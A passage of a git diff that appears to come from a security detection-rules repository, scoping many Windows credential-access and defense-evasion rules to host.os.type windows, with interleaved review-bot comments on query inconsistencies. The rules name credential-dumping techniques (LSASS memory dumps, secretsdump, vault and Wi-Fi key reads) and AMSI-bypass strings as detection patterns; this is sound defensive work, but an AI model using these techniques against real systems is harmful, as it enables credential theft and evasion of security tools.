 query = '''
-event.category:process and powershell.file.script_block_text:(MiniDumpWriteDump or MiniDumpWithFullMemory or pmuDetirWpmuDiniM) and not user.id : "S-1-5-18"
+event.category:process and host.os.type:windows and powershell.file.script_block_text:(MiniDumpWriteDump or MiniDumpWithFullMemory or pmuDetirWpmuDiniM) and not user.id : "S-1-5-18"
 '''
diff --git a/rules/windows/credential_access_posh_request_ticket.toml b/rules/windows/credential_access_posh_request_ticket.toml
index 9e4d39463..6191ae909 100644
--- a/rules/windows/credential_access_posh_request_ticket.toml
+++ b/rules/windows/credential_access_posh_request_ticket.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/05"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -81,7 +81,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text : (
 KerberosRequestorSecurityToken
 ) and not user.id : "S-1-5-18"
diff --git a/rules/windows/credential_access_potential_lsa_memdump_via_mirrordump.toml b/rules/windows/credential_access_potential_lsa_memdump_via_mirrordump.toml
index 82a9175bf..06d4aad1c 100644
--- a/rules/windows/credential_access_potential_lsa_memdump_via_mirrordump.toml
+++ b/rules/windows/credential_access_potential_lsa_memdump_via_mirrordump.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.code == "10" and
+process where host.os.type == "windows" and event.code == "10" and
 /* LSASS requesting DuplicateHandle access right to another process */
 process.name : "lsass.exe" and winlog.event_data.GrantedAccess == "0x40" and
diff --git a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
index a261356bd..24ee1c504 100644
--- a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
+++ b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : "rundll32.exe" and
 /* Rundll32 WbeDav Client */
diff --git a/rules/windows/credential_access_remote_sam_secretsdump.toml b/rules/windows/credential_access_remote_sam_secretsdump.toml
index 84e355e24..2478c7b81 100644
--- a/rules/windows/credential_access_remote_sam_secretsdump.toml
+++ b/rules/windows/credential_access_remote_sam_secretsdump.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -82,7 +82,7 @@ sequence by host.id, user.id with maxspan=1m
 event.outcome == "success" and event.action == "logged-in" and winlog.logon.type == "Network" and
 not user.name == "ANONYMOUS LOGON" and not user.domain == "NT AUTHORITY" and
 source.ip != "127.0.0.1" and source.ip !="::1"]
- [file where event.action == "creation" and process.name : "svchost.exe" and
+ [file where host.os.type == "windows" and event.action == "creation" and process.name : "svchost.exe" and
 file.Ext.header_bytes : "72656766*" and user.id : ("S-1-5-21-*", "S-1-12-1-*") and file.size >= 30000 and
 not file.path : ("?:\\Windows\\system32\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry",
diff --git a/rules/windows/credential_access_saved_creds_vault_winlog.toml b/rules/windows/credential_access_saved_creds_vault_winlog.toml
index 840624ca6..1a18d6709 100644
--- a/rules/windows/credential_access_saved_creds_vault_winlog.toml
+++ b/rules/windows/credential_access_saved_creds_vault_winlog.toml
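Review bot: In the remote_sam_secretsdump sequence only the second step, `[file where host.os.type == "windows" and ...`, gains the host.os.type term; the head of the first authentication step starts outside the hunk, so I cannot see whether it received the same filter. If it did not, the two steps are now scoped differently and a logon event that lacks or carries another host.os.type can still open the sequence, which defeats the purpose of the narrowing. Worth checking that step's opening line and adding `host.os.type == "windows" and` there too if it is missing.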
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -37,11 +37,11 @@ sequence by winlog.computer_name, winlog.process.pid with maxspan=1s
 /* 2 consecutive vault reads from same pid for web creds */
- [any where event.code : "5382" and
+ [any where host.os.type == "windows" and event.code : "5382" and
 (winlog.event_data.SchemaFriendlyName : "Windows Web Password Credential" or winlog.event_data.Resource : "http*") and
 not winlog.event_data.SubjectLogonId : "0x3e7"]
- [any where event.code : "5382" and
+ [any where host.os.type == "windows" and event.code : "5382" and
 (winlog.event_data.SchemaFriendlyName : "Windows Web Password Credential" or winlog.event_data.Resource : "http*") and
 not winlog.event_data.SubjectLogonId : "0x3e7"]
 '''
diff --git a/rules/windows/credential_access_saved_creds_vaultcmd.toml b/rules/windows/credential_access_saved_creds_vaultcmd.toml
index f94fd6218..b08967846 100644
--- a/rules/windows/credential_access_saved_creds_vaultcmd.toml
+++ b/rules/windows/credential_access_saved_creds_vaultcmd.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -35,7 +35,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.pe.original_file_name:"vaultcmd.exe" or process.name:"vaultcmd.exe") and
 process.args:"/list*"
 '''
diff --git a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
index 74b06c701..80dd6032c 100644
--- a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
+++ b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -90,7 +90,8 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.action: "Authorization Policy Change" and event.code:4704 and winlog.event_data.PrivilegeList:"SeEnableDelegationPrivilege"
+event.action:"Authorization Policy Change" and host.os.type:windows and event.code:4704 and
+ winlog.event_data.PrivilegeList:"SeEnableDelegationPrivilege"
 '''
diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml
index 4e7d31759..a3c4b501e 100644
--- a/rules/windows/credential_access_shadow_credentials.toml
+++ b/rules/windows/credential_access_shadow_credentials.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -44,7 +44,7 @@ Attackers with write privileges on this attribute over an object can abuse it to
 ### False positive analysis
-- Administrators might use custom accounts on Azure AD Connect. If this is the case, make sure the account is properly secured. You can also create an exception for the account if expected activity makes too much noise in your environment.
+- Administrators might use custom accounts on Azure AD Connect. If this is the case, make sure the account is properly secured. You can also create an exception for the account if expected activity makes too much noise in your environment.
 ### Response and remediation
@@ -92,8 +92,9 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.action:"Directory Service Changes" and event.code:"5136" and
- winlog.event_data.AttributeLDAPDisplayName:"msDS-KeyCredentialLink" and winlog.event_data.AttributeValue :B\:828* and not winlog.event_data.SubjectUserName: MSOL_*
+event.action:"Directory Service Changes" and host.os.type:windows and event.code:"5136" and
+ winlog.event_data.AttributeLDAPDisplayName:"msDS-KeyCredentialLink" and winlog.event_data.AttributeValue :B\:828* and
+ not winlog.event_data.SubjectUserName: MSOL_*
 '''
diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml
index 5c061a5e6..c5d4f1461 100644
--- a/rules/windows/credential_access_spn_attribute_modified.toml
+++ b/rules/windows/credential_access_spn_attribute_modified.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -99,8 +99,9 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.action:"Directory Service Changes" and event.code:5136 and winlog.event_data.ObjectClass:"user"
-and winlog.event_data.AttributeLDAPDisplayName:"servicePrincipalName"
+event.action:"Directory Service Changes" and host.os.type:windows and
+ event.code:5136 and winlog.event_data.ObjectClass:"user" and
+ winlog.event_data.AttributeLDAPDisplayName:"servicePrincipalName"
 '''
diff --git a/rules/windows/credential_access_suspicious_comsvcs_imageload.toml b/rules/windows/credential_access_suspicious_comsvcs_imageload.toml
index a52c218d3..51068d5b1 100644
--- a/rules/windows/credential_access_suspicious_comsvcs_imageload.toml
+++ b/rules/windows/credential_access_suspicious_comsvcs_imageload.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,9 +31,9 @@ type = "eql"
 query = '''
 sequence by process.entity_id with maxspan=1m
- [process where event.category == "process" and
+ [process where host.os.type == "windows" and event.category == "process" and
 process.name : "rundll32.exe"]
- [process where event.category == "process" and event.dataset : "windows.sysmon_operational" and event.code == "7" and
+ [process where host.os.type == "windows" and event.category == "process" and event.dataset : "windows.sysmon_operational" and event.code == "7" and
 (file.pe.original_file_name : "COMSVCS.DLL" or file.pe.imphash : "EADBCCBB324829ACB5F2BBE87E5549A8") and
 /* renamed COMSVCS */
 not file.name : "COMSVCS.DLL"]
diff --git a/rules/windows/credential_access_suspicious_lsass_access_generic.toml b/rules/windows/credential_access_suspicious_lsass_access_generic.toml
index 99364a3bf..bfbc7ecbe 100644
--- a/rules/windows/credential_access_suspicious_lsass_access_generic.toml
+++ b/rules/windows/credential_access_suspicious_lsass_access_generic.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/22"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.code == "10" and
+process where host.os.type == "windows" and event.code == "10" and
 winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe" and not winlog.event_data.GrantedAccess : ("0x1000", "0x1400", "0x101400", "0x101000", "0x101001", "0x100000", "0x100040", "0x3200", "0x40", "0x3200") and
diff --git a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml
index eaf90c23f..434268ca5 100644
--- a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml
+++ b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.code == "10" and
+process where host.os.type == "windows" and event.code == "10" and
 winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe" and
 /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/
diff --git a/rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml b/rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
index df729969f..667f0113a 100644
--- a/rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
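Review bot: The `not winlog.event_data.GrantedAccess : (...)` exclusion list in the credential_access_suspicious_lsass_access_generic hunk contains `"0x3200"` twice (`"0x3200", "0x40", "0x3200"`); the duplicate does not change matching, but it reads as if a different access mask was meant for one of the two slots, so either drop the second `"0x3200"` or replace it with the mask that was intended. This is pre-existing context rather than something the commit introduced, and the query body continues past the end of the hunk.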
+++ b/rules/windows/credential_access_suspicious_lsass_access_via_snapshot.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "threshold"
 query = '''
-event.category:process and event.code:10 and
+event.category:process and host.os.type:windows and event.code:10 and
 winlog.event_data.TargetImage:("C:\\Windows\\system32\\lsass.exe" or "c:\\Windows\\system32\\lsass.exe" or "c:\\Windows\\System32\\lsass.exe")
diff --git a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml
index cd8f3a6e5..6781f76d8 100644
--- a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml
+++ b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -89,12 +89,12 @@ type = "eql"
 query = '''
 sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan=1m
- [iam where event.action == "logged-in-special" and
+ [iam where host.os.type == "windows" and event.action == "logged-in-special" and
 winlog.event_data.PrivilegeList : "SeBackupPrivilege" and
 /* excluding accounts with existing privileged access */
 not winlog.event_data.PrivilegeList : "SeDebugPrivilege"]
- [any where event.action == "Detailed File Share" and winlog.event_data.RelativeTargetName : "winreg"]
+ [any where host.os.type == "windows" and event.action == "Detailed File Share" and winlog.event_data.RelativeTargetName : "winreg"]
 '''
diff --git a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml
index 121357be4..9e490f091 100644
--- a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml
+++ b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -100,7 +100,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start","process_created") and
+process where host.os.type == "windows" and event.type == "start" and
 process.pe.original_file_name in ("Cmd.Exe","PowerShell.EXE") and
 /* Create Symbolic Link to Shadow Copies */
diff --git a/rules/windows/credential_access_via_snapshot_lsass_clone_creation.toml b/rules/windows/credential_access_via_snapshot_lsass_clone_creation.toml
index 288fbd574..dfbe2d103 100644
--- a/rules/windows/credential_access_via_snapshot_lsass_clone_creation.toml
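Review bot: In the credential_access_symbolic_link_to_shadow_copy_created hunk the rewritten first line does more than add the OS gate: `event.type in ("start","process_created")` becomes `event.type == "start"`, so any source that reports process creation as `process_created` stops matching this rule. If dropping the alias is deliberate (for example because the rule's integrations only ever emit `start`), a sentence in the commit message would make that clear; otherwise keep it, `process where host.os.type == "windows" and event.type in ("start","process_created") and`. The query body continues past the end of the hunk.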
+++ b/rules/windows/credential_access_via_snapshot_lsass_clone_creation.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -35,7 +35,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.code:"4688" and
+process where host.os.type == "windows" and event.code:"4688" and
 process.executable : "?:\\Windows\\System32\\lsass.exe" and process.parent.executable : "?:\\Windows\\System32\\lsass.exe"
 '''
diff --git a/rules/windows/credential_access_wireless_creds_dumping.toml b/rules/windows/credential_access_wireless_creds_dumping.toml
index bb8974cbe..bb59fca1a 100644
--- a/rules/windows/credential_access_wireless_creds_dumping.toml
+++ b/rules/windows/credential_access_wireless_creds_dumping.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "netsh.exe" or process.pe.original_file_name == "netsh.exe") and process.args : "wlan" and process.args : "key*clear"
 '''
diff --git a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml
index 626a5f9c4..c1c4c2416 100644
--- a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml
+++ b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : "attrib.exe" and process.args : "+h"
 '''
diff --git a/rules/windows/defense_evasion_amsi_bypass_dllhijack.toml b/rules/windows/defense_evasion_amsi_bypass_dllhijack.toml
index ae8995454..a99d2c3a9 100644
--- a/rules/windows/defense_evasion_amsi_bypass_dllhijack.toml
+++ b/rules/windows/defense_evasion_amsi_bypass_dllhijack.toml
@@ -4,7 +4,7 @@ integration = ["windows", "endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -74,7 +74,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.action != "deletion" and file.path != null and
+file where host.os.type == "windows" and event.action != "deletion" and file.path != null and
 file.name : ("amsi.dll", "amsi") and not file.path : ("?:\\Windows\\system32\\amsi.dll", "?:\\Windows\\Syswow64\\amsi.dll")
 '''
diff --git a/rules/windows/defense_evasion_amsi_bypass_powershell.toml b/rules/windows/defense_evasion_amsi_bypass_powershell.toml
index 897a4aed7..ab373dbfb 100644
--- a/rules/windows/defense_evasion_amsi_bypass_powershell.toml
+++ b/rules/windows/defense_evasion_amsi_bypass_powershell.toml
@@ -77,9 +77,8 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category :"process" and
- (
- powershell.file.script_block_text :
+event.category:"process" and host.os.type:windows and
+ (powershell.file.script_block_text :
 ("System.Management.Automation.AmsiUtils" or
 amsiInitFailed or
 Invoke-AmsiBypass or
@@ -94,11 +93,9 @@ event.category :"process" and
 unloadsilent or
 AmsiX64 or
 AmsiX32 or
- FindAmsiFun) or
-
- powershell.file.script_block_text : ("[System.Runtime.InteropServices.Marshal]::Copy" and "VirtualProtect") or
-
- powershell.file.script_block_text : ("[Ref].Assembly.GetType(('System.Management.Automation" and ".SetValue(")
+ FindAmsiFun) or
+ powershell.file.script_block_text:("[System.Runtime.InteropServices.Marshal]::Copy" and "VirtualProtect") or
+ powershell.file.script_block_text:("[Ref].Assembly.GetType(('System.Management.Automation" and ".SetValue(")
 )
 '''
diff --git a/rules/windows/defense_evasion_amsienable_key_mod.toml b/rules/windows/defense_evasion_amsienable_key_mod.toml
index 9015a6ed7..4bf0a554a 100644
--- a/rules/windows/defense_evasion_amsienable_key_mod.toml
+++ b/rules/windows/defense_evasion_amsienable_key_mod.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -91,7 +91,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where event.type in ("creation", "change") and
+registry where host.os.type == "windows" and event.type in ("creation", "change") and
 registry.path : (
 "HKEY_USERS\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable",
 "HKU\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable",
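Review bot: defense_evasion_amsi_bypass_powershell.toml changes its query in two hunks (`@@ -77,9 +77,8 @@` and `@@ -94,11 +93,9 @@`) but, unlike every other rule in this diff, has no hunk bumping `updated_date`; its first hunk starts at line 77, so a change near the top of the file would be visible here. The query edit is a real behavioural change (the `host.os.type:windows` gate), so the file should carry the same `updated_date = "2023/02/22"` bump the others get, or the rule's metadata will claim it is older than its query. The remaining edits in these two hunks (`event.category :"process"` to `event.category:"process"`, the `(` folded onto the `powershell.file.script_block_text` line, the two blank lines removed) are cosmetic and fine.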
diff --git a/rules/windows/defense_evasion_clearing_windows_console_history.toml b/rules/windows/defense_evasion_clearing_windows_console_history.toml
index 4290604e6..0300edd00 100644
--- a/rules/windows/defense_evasion_clearing_windows_console_history.toml
+++ b/rules/windows/defense_evasion_clearing_windows_console_history.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Austin Songer"]
@@ -73,7 +73,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name == "PowerShell.EXE") and (process.args : "*Clear-History*" or (process.args : ("*Remove-Item*", "rm") and process.args : ("*ConsoleHost_history.txt*", "*(Get-PSReadlineOption).HistorySavePath*")) or
diff --git a/rules/windows/defense_evasion_clearing_windows_event_logs.toml b/rules/windows/defense_evasion_clearing_windows_event_logs.toml
index 875d019ce..19d04ac25 100644
--- a/rules/windows/defense_evasion_clearing_windows_event_logs.toml
+++ b/rules/windows/defense_evasion_clearing_windows_event_logs.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/19"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -69,7 +69,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 (
 (process.name : "wevtutil.exe" or process.pe.original_file_name == "wevtutil.exe") and
diff --git a/rules/windows/defense_evasion_clearing_windows_security_logs.toml b/rules/windows/defense_evasion_clearing_windows_security_logs.toml
index dfe45a89a..e3f94aef3 100644
--- a/rules/windows/defense_evasion_clearing_windows_security_logs.toml
+++ b/rules/windows/defense_evasion_clearing_windows_security_logs.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic", "Anabella Cristaldi"]
@@ -56,7 +56,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.action:("audit-log-cleared" or "Log clear")
+event.action:("audit-log-cleared" or "Log clear") and host.os.type:windows
 '''
diff --git a/rules/windows/defense_evasion_code_signing_policy_modification_builtin_tools.toml b/rules/windows/defense_evasion_code_signing_policy_modification_builtin_tools.toml
index 4903fe904..a5e50c522 100644
--- a/rules/windows/defense_evasion_code_signing_policy_modification_builtin_tools.toml
+++ b/rules/windows/defense_evasion_code_signing_policy_modification_builtin_tools.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 /* Windows */
 ((process.name: "bcdedit.exe" or process.pe.original_file_name == "bcdedit.exe") and process.args: ("-set", "/set") and
diff --git a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml
index 2729bfaa5..66c9e9a26 100644
--- a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml
+++ b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where event.type : ("creation", "change") and
+registry where host.os.type == "windows" and event.type : ("creation", "change") and
 (
 registry.path : "HKEY_USERS\\*\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing\\BehaviorOnFailedVerify" and
 registry.value: "BehaviorOnFailedVerify" and
diff --git a/rules/windows/defense_evasion_create_mod_root_certificate.toml b/rules/windows/defense_evasion_create_mod_root_certificate.toml
index 960087db0..065132233 100644
--- a/rules/windows/defense_evasion_create_mod_root_certificate.toml
+++ b/rules/windows/defense_evasion_create_mod_root_certificate.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -88,7 +88,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where event.type in ("creation", "change") and
+registry where host.os.type == "windows" and event.type in ("creation", "change") and
 registry.path : (
 "HKLM\\Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\*\\Blob",
diff --git a/rules/windows/defense_evasion_cve_2020_0601.toml b/rules/windows/defense_evasion_cve_2020_0601.toml
index 700bdc0b9..535d040ee 100644
--- a/rules/windows/defense_evasion_cve_2020_0601.toml
+++ b/rules/windows/defense_evasion_cve_2020_0601.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -25,7 +25,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.provider:"Microsoft-Windows-Audit-CVE" and message:"[CVE-2020-0601]"
+event.provider:"Microsoft-Windows-Audit-CVE" and message:"[CVE-2020-0601]" and host.os.type:windows
 '''
diff --git a/rules/windows/defense_evasion_defender_disabled_via_registry.toml b/rules/windows/defense_evasion_defender_disabled_via_registry.toml
index 7c944f798..e570adcf4 100644
--- a/rules/windows/defense_evasion_defender_disabled_via_registry.toml
+++ b/rules/windows/defense_evasion_defender_disabled_via_registry.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -75,7 +75,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where event.type in ("creation", "change") and
+registry where host.os.type == "windows" and event.type in ("creation", "change") and
 (
 (
 registry.path: (
diff --git a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml
index 6cd9da634..c99c44d91 100644
--- a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml
+++ b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
